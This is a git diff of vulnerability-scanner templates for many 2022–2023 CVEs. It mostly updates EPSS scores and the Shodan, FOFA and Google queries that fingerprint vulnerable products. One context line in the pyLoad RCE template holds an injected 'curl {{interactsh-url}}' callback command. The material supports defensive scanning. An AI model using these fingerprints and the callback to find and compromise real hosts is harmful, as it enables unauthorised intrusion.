674ba7414d..8037c57a0c 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -21,15 +21,17 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42749 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.42811 + epss-score: 0.00111 + epss-percentile: 0.44292 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: auieo product: candidats - shodan-query: http.html:"CandidATS" + shodan-query: + - http.html:"CandidATS" + - http.html:"candidats" fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index d6ad8ae12e..1c08ea0c16 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -28,9 +28,9 @@ info: vendor: appjetty product: show_all_comments framework: wordpress - publicwww-query: /wp-content/plugins/show-all-comments-in-one-page shodan-query: http.html:/wp-content/plugins/show-all-comments-in-one-page fofa-query: body=/wp-content/plugins/show-all-comments-in-one-page + publicwww-query: /wp-content/plugins/show-all-comments-in-one-page tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty http: diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 597ad2ddb7..aa8ddb10f9 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve2022,cve,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 9775a520b9..d0963bf496 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index a1092ce628..3cec46f8ca 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve2022,cve,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 792970c05a..5f724a60f0 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index d1a00915ab..aad436fe5a 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 54123c2046..b8d9c04e22 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -25,9 +25,9 @@ info: vendor: wp-buy product: login_as_user_or_customer_\(user_switching\) framework: wordpress - publicwww-query: /wp-content/plugins/login-as-customer-or-user shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user fofa-query: body=/wp-content/plugins/login-as-customer-or-user + publicwww-query: /wp-content/plugins/login-as-customer-or-user tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy http: diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index e3e3d11b41..5f5be46b66 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -18,16 +18,21 @@ info: cvss-score: 7.5 cve-id: CVE-2022-43140 cwe-id: CWE-918 - epss-score: 0.15211 - epss-percentile: 0.95316 + epss-score: 0.01954 + epss-percentile: 0.88673 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: app="kkFileView" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - app="kkFileView" + - app="kkfileview" + - body="kkfileview" tags: cve2022,cve,ssrf,kkFileview,keking http: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index e02cf51aae..e8fe5e157f 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43165 cwe-id: CWE-79 - epss-score: 0.00197 - epss-percentile: 0.56575 + epss-score: 0.00363 + epss-percentile: 0.72306 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 0260380daf..17eb6def11 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43166 cwe-id: CWE-79 - epss-score: 0.00197 - epss-percentile: 0.56575 + epss-score: 0.00363 + epss-percentile: 0.72306 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 00849a488f..0fde0972d0 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -29,9 +29,9 @@ info: vendor: wpswings product: pdf_generator_for_wordpress framework: wordpress - publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" shodan-query: http.html:/wp-content/plugins/pdf-generator-for-wp fofa-query: body=/wp-content/plugins/pdf-generator-for-wp + publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings http: diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index d44d8a29fa..49637bb90e 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 - epss-score: 0.33038 - epss-percentile: 0.96634 + epss-score: 0.68571 + epss-percentile: 0.97978 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 055295ce1d..92e9cdcf6a 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: control-webpanel product: webpanel - shodan-query: http.title:"Login | Control WebPanel" + shodan-query: + - http.title:"Login | Control WebPanel" + - http.title:"login | control webpanel" fofa-query: title="login | control webpanel" google-query: intitle:"login | control webpanel" tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index dc9e2bc9d0..50b2cd8202 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44944 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.37842 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 762fd50d19..05208a18ce 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-44946 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38539 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index f4a4f29b6e..6206da0636 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44950 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.37842 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 07a2b5374f..cb6812aa19 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -28,9 +28,11 @@ info: vendor: wpchill product: download_monitor framework: wordpress - shodan-query: html:"/wp-content/plugins/download-monitor/" + shodan-query: + - html:"/wp-content/plugins/download-monitor/" + - http.html:"/wp-content/plugins/download-monitor/" fofa-query: body="/wp-content/plugins/download-monitor/" - tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp + tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp,wpchill http: - method: GET diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index e74f9d6693..07807ed6b9 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -27,10 +27,10 @@ info: vendor: urosevic product: stock_ticker framework: wordpress - publicwww-query: "/wp-content/plugins/stock-ticker/" shodan-query: http.html:/wp-content/plugins/stock-ticker/ fofa-query: body=/wp-content/plugins/stock-ticker/ - tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss + publicwww-query: "/wp-content/plugins/stock-ticker/" + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss,urosevic http: - raw: diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index 20b4393803..338b8cadc1 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45835 cwe-id: CWE-918 epss-score: 0.00359 - epss-percentile: 0.71627 + epss-percentile: 0.72144 cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index e85e861ccb..1d80b0dafc 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: ilias product: ilias - shodan-query: http.html:"ILIAS" + shodan-query: + - http.html:"ILIAS" + - http.html:"ilias" fofa-query: body="ilias" tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 6553267523..8db6690e21 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: kubeview_project product: kubeview - shodan-query: http.title:"KubeView" - fofa-query: icon_hash=-379154636 + shodan-query: + - http.title:"KubeView" + - http.title:"kubeview" + - http.favicon.hash:-379154636 + fofa-query: + - icon_hash=-379154636 + - title="kubeview" google-query: intitle:"kubeview" tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index b4b8c945ae..afee472e3b 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-46071 cwe-id: CWE-89 epss-score: 0.01454 - epss-percentile: 0.86393 + epss-percentile: 0.86654 cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index aa6fc64388..c7106c825e 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -29,9 +29,18 @@ info: max-request: 1 vendor: cacti product: cacti - shodan-query: title:"Login to Cacti" - fofa-query: icon_hash="-1797138069" - google-query: intitle:"cacti" + shodan-query: + - title:"Login to Cacti" + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 43c09d75ef..cecfcbaa83 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: niceforyou product: linear_emerge_e3_access_control_firmware - shodan-query: http.html:"Linear eMerge" + shodan-query: + - http.html:"Linear eMerge" + - http.html:"linear emerge" fofa-query: body="linear emerge" tags: cve,cve2022,xss,emerge,linear,niceforyou diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index 0fa198b5eb..4b8ae5d13c 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-46443 cwe-id: CWE-89 epss-score: 0.05592 - epss-percentile: 0.93095 + epss-percentile: 0.93248 cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 4e02ca493e..babbd5d474 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: nexusphp product: nexusphp - shodan-query: http.favicon.hash:-582931176 + shodan-query: + - http.favicon.hash:-582931176 + - cpe:"cpe:2.3:a:nexusphp:nexusphp" fofa-query: icon_hash=-582931176 tags: cve,cve2022,nexus,php,nexusphp,xss diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 5ae2e1994a..df3133b976 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -26,8 +26,12 @@ info: max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve,cve2022,xss,kkfileview,keking http: diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index edf8e1eff8..061424f51c 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -29,7 +29,9 @@ info: max-request: 3 vendor: masacms product: masacms - shodan-query: 'Generator: Masa CMS' + shodan-query: + - 'Generator: Masa CMS' + - "generator: masa cms" tags: cve,cve2022,auth-bypass,cms,masa,masacms http: diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 0b3e0366f1..f66ac4443f 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -29,7 +29,9 @@ info: max-request: 3 vendor: murasoftware product: mura_cms - shodan-query: 'Generator: Mura CMS' + shodan-query: + - 'Generator: Mura CMS' + - "generator: mura cms" tags: cve,cve2022,auth-bypass,cms,mura,murasoftware http: diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml index 9b12e3ac63..fea929fed9 100644 --- a/http/cves/2022/CVE-2022-47501.yaml +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -17,15 +17,21 @@ info: cvss-score: 7.5 cve-id: CVE-2022-47501 cwe-id: CWE-22 - epss-score: 0.12161 - epss-percentile: 0.94898 + epss-score: 0.09756 + epss-percentile: 0.94792 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: ofbiz - shodan-query: "html:\"OFBiz\"" - fofa-query: "app=\"Apache_OFBiz\"" + shodan-query: + - "html:\"OFBiz\"" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - "app=\"Apache_OFBiz\"" + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2022,apache,ofbiz,lfi http: diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 232421323d..cddc995cea 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -29,9 +29,9 @@ info: vendor: thimpress product: learnpress framework: wordpress - publicwww-query: "/wp-content/plugins/learnpress" shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress + publicwww-query: "/wp-content/plugins/learnpress" tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress http: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 910a6fbdba..b091627374 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -29,8 +29,13 @@ info: max-request: 2 vendor: thinkphp product: thinkphp - shodan-query: title:"Thinkphp" - fofa-query: header="think_lang" + shodan-query: + - title:"Thinkphp" + - http.title:"thinkphp" + - cpe:"cpe:2.3:a:thinkphp:thinkphp" + fofa-query: + - header="think_lang" + - title="thinkphp" google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,lfi diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 0b34a2dd6c..069c97cfb5 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_access_manager_plus - shodan-query: title:"ManageEngine" + shodan-query: + - title:"ManageEngine" + - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index 97d973e7db..daac10983c 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -28,8 +28,10 @@ info: max-request: 1 vendor: linux product: linux_kernel - shodan-query: html:"Aspera Faspex" - tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm + shodan-query: + - html:"Aspera Faspex" + - cpe:"cpe:2.3:o:linux:linux_kernel" + tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm,linux http: - raw: diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 85df6e54b5..6dc72856be 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: opencats product: opencats - shodan-query: title:"opencats" + shodan-query: + - title:"opencats" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 2483354417..7668f6cd5a 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -26,7 +26,9 @@ info: max-request: 9 vendor: yui_project product: yui - shodan-query: html:"bower_components/yui2/" + shodan-query: + - html:"bower_components/yui2/" + - http.html:"bower_components/yui2/" fofa-query: body="bower_components/yui2/" tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index 7ab571c47e..c47ec3e49e 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -21,13 +21,14 @@ info: epss-percentile: 0.84061 cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: wprealize - product: extensive_vc_addons_for_wpbakery_page_builder + product: "extensive_vc_addons_for_wpbakery_page_builder" framework: wordpress - shodan-query: http.html:/wp-content/plugins/extensive-vc-addon/ - fofa-query: body=/wp-content/plugins/extensive-vc-addon/ + shodan-query: "http.html:/wp-content/plugins/extensive-vc-addon/" + fofa-query: "body=/wp-content/plugins/extensive-vc-addon/" publicwww-query: "/wp-content/plugins/extensive-vc-addon/" - tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon + tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize http: - raw: diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 26cafe16f6..f21057eec9 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -29,10 +29,21 @@ info: max-request: 2 vendor: pyload product: pyload - shodan-query: html:"pyload" - fofa-query: title="login - pyload" - google-query: intitle:"login - pyload" - zoomeye-query: app:"pyLoad" + shodan-query: + - html:"pyload" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - title="login - pyload" + - body="pyload" + - title="pyload" + google-query: + - intitle:"login - pyload" + - intitle:"pyload" + zoomeye-query: + - app:"pyLoad" + - app:"pyload" tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 5a23d85203..ade7803908 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer - shodan-query: http.favicon.hash:1484947000 - fofa-query: app="goanywhere-mft" + shodan-query: + - http.favicon.hash:1484947000 + - http.favicon.hash:1484947000,1828756398,1170495932 + fofa-query: + - app="goanywhere-mft" + - icon_hash=1484947000 + - icon_hash=1484947000,1828756398,1170495932 zoomeye-query: app:"fortra goanywhere-mft" tags: cve2023,cve,rce,goanywhere,oast,kev,fortra diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index e9fa8facd9..19a95204fc 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -17,10 +17,13 @@ info: epss-percentile: 0.8962 cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: phpipam product: phpipam - shodan-query: html:"phpIPAM IP address management" - fofa-query: body="phpipam ip address management" + shodan-query: + - "html:\"phpIPAM IP address management\"" + - http.html:"phpipam ip address management" + fofa-query: "body=\"phpipam ip address management\"" tags: cve,cve2023,php,phpipam,unauth http: diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml index 8bf35a1aaa..8788837e19 100644 --- a/http/cves/2023/CVE-2023-0777.yaml +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -25,8 +25,14 @@ info: max-request: 3 vendor: modoboa product: modoboa - shodan-query: html:"Modoboa" - fofa-query: body="Modoboa" + shodan-query: + - html:"Modoboa" + - http.favicon.hash:1949005079 + - http.html:"modoboa" + fofa-query: + - body="Modoboa" + - body="modoboa" + - icon_hash=1949005079 tags: cve2023,cve,huntr,packetstorm,modoboa,default-login http: diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index a769e1f62d..85ab8c4fd4 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -23,8 +23,12 @@ info: max-request: 2 vendor: flatpress product: flatpress - shodan-query: http.favicon.hash:-1189292869 - fofa-query: body="flatpress" + shodan-query: + - http.favicon.hash:-1189292869 + - http.html:"flatpress" + fofa-query: + - body="flatpress" + - icon_hash=-1189292869 tags: cve,cve2023,huntr,lfi,flatpress,listing http: diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 6ba483e3de..4db58c6c19 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -30,7 +30,9 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index ca70240103..0c58956481 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: evilmartians product: imgproxy - shodan-query: "Server: imgproxy" + shodan-query: + - "Server: imgproxy" + - "server: imgproxy" tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians http: diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index e49467e9c9..0eab7607b8 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -29,8 +29,14 @@ info: max-request: 1 vendor: sophos product: web_appliance - shodan-query: title:"Sophos Web Appliance" - fofa-query: title="Sophos Web Appliance" + shodan-query: + - title:"Sophos Web Appliance" + - http.title:"sophos web appliance" + - http.favicon.hash:-893681401 + fofa-query: + - title="Sophos Web Appliance" + - title="sophos web appliance" + - icon_hash=-893681401 google-query: intitle:"sophos web appliance" tags: cve2023,cve,packetstorm,rce,sophos,oast,kev diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index ce1af8b645..419ab84b3e 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wago product: compact_controller_100_firmware - shodan-query: html:"/wbm/" html:"wago" + shodan-query: + - html:"/wbm/" html:"wago" + - http.html:"/wbm/" html:"wago" fofa-query: body="/wbm/" html:"wago" tags: cve2023,cve,wago,rce diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index 268e7d9d18..dcc48437a5 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -23,7 +23,9 @@ info: max-request: 1 vendor: bitrix24 product: bitrix24 - shodan-query: html:"/bitrix/" + shodan-query: + - html:"/bitrix/" + - http.html:"/bitrix/" fofa-query: body="/bitrix/" tags: cve2023,cve,bitrix,xss,bitrix24 diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index c61f3dbeda..8dddac099d 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1835 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29003 + epss-score: 0.0011 + epss-percentile: 0.44066 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index 83b1cc6592..56a36e9398 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -23,7 +23,9 @@ info: vendor: contribsys product: sidekiq shodan-query: 